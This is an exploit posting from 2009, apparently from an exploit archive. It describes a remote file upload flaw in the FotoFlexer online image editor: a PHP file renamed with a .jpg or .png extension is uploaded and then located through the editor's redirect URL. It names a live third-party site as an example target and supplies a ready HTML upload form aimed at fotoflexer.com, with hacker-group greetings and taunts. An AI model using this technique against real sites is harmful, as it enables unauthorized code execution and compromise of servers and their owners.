fotoflexer-upload.txt
Posted on 13 July 2009
[*]############################################## [+] |____ViRuS_HiMa@YouR SyS__|__ # [+] |______________________|___||*___ # [+] |______________________|___||""|"*\___, # [+] |______________________|___||""|*"|___|| # [+] "([ (@)''(@)""""""(|*(@)(@)********(@)* # [+]======================================================================|| [*] Title : FotoFlexer Remote File Upload Vulnerability || [!] site script : http://www.fotoflexer.com || [!] Author : ViRuS_HiMa || [!] My Site : wWw.HeLL-z0ne.org || [!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM || [!] Location : Cairo-007 || [!]======================================================================|| [!] [H]eL[L] [Z]on[E] [C]re[W] - [ ViRuS_HiMa ~ MecTruy ~ RedStorM ] || [!]======================================================================|| [!] Exploitation : [!] [!] Fotoflexer is A online images editor script . . [!] [!] it's allow you to upload 2 types of images : png & jpg [!] [!] So you can upload your file as hima.php.jpg 'or' hima.php.png [!] [!] but how to get your file link after uploading ?? [!] [!] here we got alive e.g on : http://tahyeess.com/fotoflexer/default.aspx [!] [!] after uploading your file you will redirect to this link : [!] [!] http://tahyeess.com/fotoflexer/API_Loader.aspx?ff_image_url= [!] http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg [!] &ff_callback_url=http://www.tahyeess.com/fotoflexer/callbackTest.aspx [!] &ff_logo_url=http://www.tahyeess.com/fotoflexer/images/logo.png [!] [!] yea its too long url but you can find your file link in it ! take look over here : [!] [!] "ff_image_url=http://www.tahyeess.com/OriginalFiles/fotoflexer/hima.php.jpg" [!] [!] Thats all we need :) [!] [!] now you should browse it from InternetExplorer :) [!] [!]===============================================================|| [!] do you want to try it on http://www.fotoflexer.com :) || [!] just use this html code to upload your file || [!] and you will find your link by the same method on tahyeess.com|| [!] but your file link will be some thing like this : || [!] ff_image_url=http://fotos.fotoflexer.com/2009/07/13/adf487e0 || [!]===============================================================|| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FotoFlexer - exploitation testing :)</title> <script type="text/javascript"> /******************************** Thankx fotoflexer for helping Me to exploit yours :p *********************************/ var ff_image_url; var ff_callback_url; var ff_cancel_url; var ff_lang; function ff_setup(img_src){ ff_image_url = img_src; ff_callback_url = "http://fotoflexer.com/API/callbackTest.php"; ff_cancel_url = "http://fotoflexer.com"; ff_lang = "en-US"; ff_activate(); } </script> <script type="text/javascript" src="http://fotoflexer.com/API/ff_api_v1_01.js"> </script> </head> <body style="text-align: center;"> <div style="width: 650px; margin: 0 auto;"> <p style="text-align: left;"><a href="/api.php">Back to FotoFlexer API</a></p> <h2>FotoFlexer - Exploitation Testing :)</h2> <p style="text-align: left;">this code was already writen by fotoflexer team and edited by ViRuS_HiMa to be decent .</p> <p style="text-align: left;">[H]eL[L] [Z]on[E] [C]re[W] - [ ViRuS_HiMa ~ MecTruy ~ RedStorM ]</p> <hr /> <h4>Click An Image To Edit:</h4> <div> <img style="cursor:pointer;width:60px;height:60px;padding:10px;" src="http://fotoflexer.com/images/moon_sample.jpg" id="http://fotoflexer.com/samples/moon.jpg" onclick="ff_setup(this.id)" /> <img style="cursor:pointer;width:60px;height:60px;padding:10px;" src="http://fotoflexer.com/images/sunflower_sample.jpg" id="http://fotoflexer.com/samples/sunflower.jpg" onclick="ff_setup(this.id)" /> <img style="cursor:pointer;width:60px;height:60px;padding:10px;" src="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif" id="http://up1.mlfnt.net/images/g38aocj60k9mstu1eso.gif" onclick="ff_setup(this.id)" /> </div> <hr /> <h4>Or, Upload An Image To Edit:</h4> <!--Pass the Callback URL as "CB" and the logo URL as "Logo"--> <form enctype="multipart/form-data" action="http://fotoflexer.com/API/API_Upload.php" method="post"> <p><input name="userfile" type="file" /><br /> <input type="hidden" name="Logo" value="http://www.fotoflexer.com/images/header.gif" /> <input type="hidden" name="CB" value="http://www.fotoflexer.com/API/callbackTest.php" /> <input type="submit" value="Upload" /></p> </form> </div> </body> </html> [*]===================================================================|| [!] Greetz 2 Allah - Muslim Hackers - Str0ke - And oTherz . || [*]===================================================================||
